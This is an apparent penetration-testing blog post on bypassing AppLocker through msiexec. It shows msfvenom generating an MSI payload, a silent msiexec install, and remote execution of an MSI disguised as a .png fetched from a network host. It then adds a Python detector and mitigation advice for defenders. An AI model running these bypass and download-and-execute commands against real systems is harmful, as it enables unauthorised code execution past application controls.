AppLocker Bypass – MSIEXEC
MSIEXEC is a Microsoft utility that can be used to install or configure a product from the command line. If an environment is not configured properly, the use of .MSI files can allow an attacker either to perform privilege escalation or to bypass AppLocker rules. The following post demonstrates that systems configured not to block execution of MSI files for all users are not properly protected, as any AppLocker executable rule can be bypassed easily.
Metasploit MsfVenom can be used in order to generate .MSI files that will execute a command or a payload.
msfvenom -f msi -p windows/exec CMD=powershell.exe > powershell.msi

No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 199 bytes
Final size of msi file: 159744 bytes
Execution of powershell.msi will open a PowerShell session, bypassing the AppLocker rule that denies the use of PowerShell for all users.
It is also possible to run the command below either from a command prompt or, if that is blocked, through Windows Run.
msiexec /quiet /i cmd.msi
The command prompt will open.
Alternatively, the msiexec utility has the ability to run MSI files that have been renamed to PNG. These files can be executed either locally or remotely, from a command prompt or from Windows Run, bypassing AppLocker rules.
msiexec /q /i http://192.168.100.3/tmp/cmd.png
The same concept also applies to MSI files that contain Meterpreter payloads.
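From the defender's side, every variant above leaves the same trace: a process-creation event (Sysmon Event ID 1, or Security 4688 with command-line auditing enabled) whose command line is msiexec installing a package silently, from a URL, or from a file whose extension is not .msi. The script below is an added detection example, not code from the original post; the command lines it scans are constructed samples modelled on the post's commands, and the finding labels and the analyse/scan function names are my own.

```python
"""Flag suspicious msiexec invocations in process-creation command lines.

Added defensive example (not part of the original post). Each command line is
tokenised, and msiexec invocations are checked for the patterns the post relies
on: a silent install, a package fetched over HTTP/UNC, and a package whose
extension is not .msi/.msp (e.g. an MSI renamed to .png).
"""
import re
from urllib.parse import urlparse

# Constructed sample command lines (not real telemetry). The first two mirror
# the commands shown in the post; the rest are benign or variants for contrast.
SAMPLE_COMMAND_LINES = [
    r'C:\Windows\System32\msiexec.exe /quiet /i cmd.msi',
    r'msiexec /q /i http://192.168.100.3/tmp/cmd.png',
    r'C:\Windows\System32\msiexec.exe /i "C:\Users\alice\Downloads\7z2301.msi"',
    r'msiexec.exe /qn /i \\fileserver\share\update.jpg',
    r'msiexec /?',
    r'notepad.exe C:\notes.txt',
]

# Switches that take a package argument (/i install, /package, /a admin install).
INSTALL_SWITCHES = {"/i", "-i", "/package", "/a", "-a"}
# Switches that suppress the installer UI.
QUIET_SWITCHES = {"/q", "/qn", "/quiet", "-q", "-qn", "-quiet", "/qb", "/passive"}
REMOTE_SCHEMES = {"http", "https", "ftp"}

TOKEN_RE = re.compile(r'"[^"]*"|\S+')


def tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping quoted paths whole."""
    return [tok.strip('"') for tok in TOKEN_RE.findall(cmdline)]


def is_msiexec(image):
    """True if the image token is msiexec, with or without a path or extension."""
    name = image.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return name in ("msiexec", "msiexec.exe")


def package_argument(tokens):
    """Return the argument following the first install switch, if any."""
    for i in range(1, len(tokens) - 1):
        if tokens[i].lower() in INSTALL_SWITCHES:
            return tokens[i + 1]
    return None


def extension(package):
    """Extension of the last path segment of a file path or URL, lower-cased."""
    name = re.split(r"[\\/]", package)[-1]
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def analyse(cmdline):
    """Return a list of findings for one command line (empty if nothing stands out)."""
    tokens = tokenize(cmdline)
    if not tokens or not is_msiexec(tokens[0]):
        return []
    findings = []
    if {t.lower() for t in tokens[1:]} & QUIET_SWITCHES:
        findings.append("silent install")
    package = package_argument(tokens)
    if package is None:
        return findings
    parsed = urlparse(package)
    if parsed.scheme.lower() in REMOTE_SCHEMES:
        findings.append(f"remote package from {parsed.netloc}")
    if package.startswith("\\\\"):
        findings.append("package on UNC path")
    ext = extension(package)
    if ext not in ("msi", "msp"):
        findings.append(f"non-MSI extension .{ext}" if ext else "package has no file extension")
    return findings


def scan(cmdlines):
    """Map each command line that produced findings to its list of findings."""
    return {line: analyse(line) for line in cmdlines if analyse(line)}


if __name__ == "__main__":
    for line, findings in scan(SAMPLE_COMMAND_LINES).items():
        print(f"{line}\n    -> {', '.join(findings)}")
```

A silent install on its own is common in legitimate software deployment, so it is a weak signal by itself; the combination with a remote or non-.msi package, or with a parent process such as explorer.exe launched from Run rather than a deployment agent, is what merits an alert. The mitigation the post points at is configuration rather than detection: the AppLocker Windows Installer rule collection has to be enforced alongside the executable rules, otherwise the executable rules can be walked around as shown.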